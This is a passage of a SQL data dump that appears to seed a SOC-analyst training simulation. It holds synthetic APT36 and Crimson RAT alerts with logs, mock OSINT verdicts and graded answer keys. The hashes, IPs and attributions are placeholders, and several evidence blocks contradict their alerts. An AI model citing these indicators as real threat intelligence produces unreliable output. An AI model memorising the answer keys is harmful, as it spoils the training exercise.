server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Compromised endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with StealthRat malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1148, 'C2 Communication Established', 'high', 'Network Traffic Analysis', 'Having established a foothold, the attackers set up command and control (C2) channels to maintain persistent access, facilitating further attacks and data exfiltration from the network.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-16T14:32:27Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.57\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/update/check\",\"request_method\":\"GET\",\"response_code\":200,\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"update.exe\"}', '2026-02-07 21:12:17', '2026-02-23 20:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malwarebytes\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware sample\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious executable observed in network traffic\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1149, 'Suspicious Email Detected', 'medium', 'Email Gateway Logs', 'An email resembling official communication was intercepted. It is suspected of being a phishing attempt by APT36 to gain initial access. The email was sent from a known malicious IP address and contains an attachment with a suspicious hash.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"email_id\":\"9876543210\",\"sender_email\":\"support@fakeservice.com\",\"recipient_email\":\"user@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_12345.pdf\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.10\",\"email_gateway\":\"gateway01.company.com\",\"alert_flag\":true}', '2026-02-07 21:13:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known phishing campaigns by APT36.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@fakeservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Email Blacklist\",\"verdict\":\"suspicious\",\"details\":\"Email domain frequently used in phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-02-08T19:00:00.282Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1150, 'Crimson RAT Executed', 'high', 'Endpoint Detection and Response (EDR)', 'Crimson RAT was executed on the victim\'s machine following an initial access through a phishing email. This malware is known for its capabilities to steal information and remotely control infected systems.', 'Malware Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:27Z\",\"event_type\":\"process_execution\",\"machine_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"CrimsonRAT.exe\",\"process_id\":5123,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1024,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\CrimsonRAT.exe\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\CrimsonRAT.exe\"}', '2026-02-07 21:13:34', '2026-02-23 20:01:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the victim\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Username associated with the affected machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Crimson RAT malware\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"CrimsonRAT.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable name associated with Crimson RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1151, 'Backdoor Persistence Established', 'high', 'System Registry Logs', 'APT36 has established a persistent backdoor using Crimson RAT by modifying the Windows Registry to ensure continued access to the compromised system. This allows the attacker to maintain a foothold within the network even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'resolved', NULL, '{\"time\":\"2023-10-15T14:32:17Z\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_key_value\":\"CrimsonRAT\",\"registry_key_data\":\"C:\\\\Windows\\\\System32\\\\CrimsonRAT.exe\",\"user\":\"admin_user\",\"source_ip\":\"192.168.1.25\",\"attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin_user\"}', '2026-02-07 21:13:34', '2026-02-23 20:07:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash of Crimson RAT binary.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT36 command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"internal\",\"details\":\"User account compromised for registry modification.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.285Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_key_value\\\":\\\"CrimsonRAT\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CrimsonRAT.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1152, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Suspicious lateral movement activity detected within the military network. A Remote Access Trojan (RAT) was used to perform internal reconnaissance and gather information on other connected systems.', 'Internal Reconnaissance', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"10.0.0.5\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"john.doe\",\"action\":\"lateral_movement\",\"filename\":\"svchost.exe\",\"external_attacker_ip\":\"203.0.113.55\",\"event_description\":\"Detected lateral movement with the use of RAT targeting internal systems.\"}', '2026-02-07 21:13:34', '2026-02-23 19:59:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal destination IP targeted by RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known RAT used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Username found associated with lateral movement activity.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"External attacker IP involved in lateral movement operation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1153, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive data has been detected being exfiltrated to an external server associated with APT36. The exfiltration involves critical national security data, posing a severe threat.', 'Data Theft', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"exfil_event_5678\",\"source_ip\":\"192.168.10.45\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"national_secrets.docx\",\"file_hash\":\"d4c74594d841139328695756648b6bd6\",\"action\":\"exfiltrated\",\"detection_method\":\"signature_match\",\"signature_id\":\"apt36_exfil_signature_v1\",\"severity\":\"high\"}', '2026-02-07 21:13:34', '2026-02-16 12:23:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with APT36 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"national_secrets.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"detection_system\",\"verdict\":\"sensitive\",\"details\":\"Contains classified information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d4c74594d841139328695756648b6bd6\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.288Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"exfil_event_5678\\\",\\\"source_ip\\\":\\\"192.168.10.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"national_secrets.docx\\\",\\\"file_hash\\\":\\\"d4c74594d841139328695756648b6bd6\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"detection_method\\\":\\\"signature_match\\\",\\\"signature_id\\\":\\\"apt36_exfil_signature_v1\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1154, 'Spear Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'A spear-phishing campaign aimed at key government officials has been detected. The campaign involves emails containing malicious attachments designed to compromise Android devices.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_subject\":\"Urgent: Review the Attached Document\",\"sender_email\":\"malicious.actor@threatmail.com\",\"recipient_email\":\"official@government.org\",\"attachment_name\":\"Document.apk\",\"attachment_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"malicious_domain\":\"www.malicious-download.com\",\"user_agent\":\"Mozilla/5.0 (Linux; Android 10; Mobile)\"}', '2026-02-07 21:13:37', '2026-02-23 19:24:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT spear-phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted government official\'s device\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"malicious.actor@threatmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Document.apk\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"APK file containing malicious payload targeting Android devices\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known Android malware\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"www.malicious-download.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used for hosting malicious APKs\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-08T19:00:00.290Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the 